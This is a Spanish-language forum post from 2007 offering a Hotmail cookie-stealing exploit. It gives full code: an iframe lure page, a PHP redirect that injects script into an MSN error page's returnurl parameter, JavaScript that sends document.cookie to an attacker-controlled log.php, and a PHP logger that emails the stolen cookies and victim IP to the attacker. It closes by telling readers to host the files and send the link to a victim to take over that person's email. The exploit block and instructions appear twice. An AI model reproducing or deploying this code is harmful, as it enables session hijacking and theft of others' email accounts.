School
23-03-2007, 16:14
Bueno estoy seguro de que este post será muy visitado jeje, como bien dice el título actualmente existe un gran bug en hotmail, tan grave que con solo pinchar en un enlace tu correo puede ser robado, este bug guarda las cookies de aquel que pinche en un enlace, de forma que son enviadas al correo que eligas(el tuyo vamos) y apartir de ahí facilmente puedes entrar al correo. Por favor si lo copiais no os olvideis la fuente, este bug era privado pero al parecer por un descuido salio a la luz.
Autor: _Antrax_
Web: www.c-group.org
Ya esta aceptado por Milw0rm aunque creo que aun no lo publicaron.
Exploit php
Index.php
Código:
<html>
<body>
<IFRAME SRC="http://www.xxxx.com/ind.php" WIDTH=10 HEIGHT=10>
<A HREF="ind.php">link</A>
</IFRAME>
</body></html>
ind.php
Código:
<?
$mysite = "http://www.xxxx.com/nice.js"; # <== Edit
$xpl = "http://moviles.es.msn.com/error.php?error=11&returnurl=%3C/script%3E%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/nice.js%3E%3C/script%3E";
print '
<title>ASD</title>
<body bgcolor="ffffff">
<center>
<b></b><br>
<img src="asd.gif"></center>
<META HTTP-EQUIV="Refresh" CONTENT="1; URL='.$xpl.'">
';
?>
log.php
Código:
<?
$cookie = $_GET['nice'];
$ip = getenv("REMOTE_ADDR");
$Time = date("l dS of F Y h:i:s A");
$msg = "Cookie: $cookie\nIP Address: $ip\Time: $Time";
$subject = "cookie";
mail("[email protected]", $subject, $msg);
header ("location: asd.gif");
?>
nice.js
Código:
location.href='http://www.xxxx.com/log.php?nice='+escape(document.cookie)
reemplazar xxx.com por el sitio donde uno alojo los php ...
By Dario Struz
Greetz www.c-group.org Fr34k , penissmen , 4ur3v0ir , S4nt0!, DevilInsideTk , Putus , Inyexion , Bacan , Hanowars ,Chapinhack and Friends.
PD: Ahí teneís el codigo, simplemente armarlo con vuestros datos, subirlo a un ftp y enviar el enlace a alguien y recibireis es vuestro correo sus cookies.
Saludos An3urysm_
Autor: _Antrax_
Web: www.c-group.org
Ya esta aceptado por Milw0rm aunque creo que aun no lo publicaron.
Exploit php
Index.php
Código:
<html>
<body>
<IFRAME SRC="http://www.xxxx.com/ind.php" WIDTH=10 HEIGHT=10>
<A HREF="ind.php">link</A>
</IFRAME>
</body></html>
ind.php
Código:
<?
$mysite = "http://www.xxxx.com/nice.js"; # <== Edit
$xpl = "http://moviles.es.msn.com/error.php?error=11&returnurl=%3C/script%3E%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/nice.js%3E%3C/script%3E";
print '
<title>ASD</title>
<body bgcolor="ffffff">
<center>
<b></b><br>
<img src="asd.gif"></center>
<META HTTP-EQUIV="Refresh" CONTENT="1; URL='.$xpl.'">
';
?>
log.php
Código:
<?
$cookie = $_GET['nice'];
$ip = getenv("REMOTE_ADDR");
$Time = date("l dS of F Y h:i:s A");
$msg = "Cookie: $cookie\nIP Address: $ip\Time: $Time";
$subject = "cookie";
mail("[email protected]", $subject, $msg);
header ("location: asd.gif");
?>
nice.js
Código:
location.href='http://www.xxxx.com/log.php?nice='+escape(document.cookie)
reemplazar xxx.com por el sitio donde uno alojo los php ...
By Dario Struz
Greetz www.c-group.org Fr34k , penissmen , 4ur3v0ir , S4nt0!, DevilInsideTk , Putus , Inyexion , Bacan , Hanowars ,Chapinhack and Friends.
PD: Ahí teneís el codigo, simplemente armarlo con vuestros datos, subirlo a un ftp y enviar el enlace a alguien y recibireis es vuestro correo sus cookies.
Saludos An3urysm_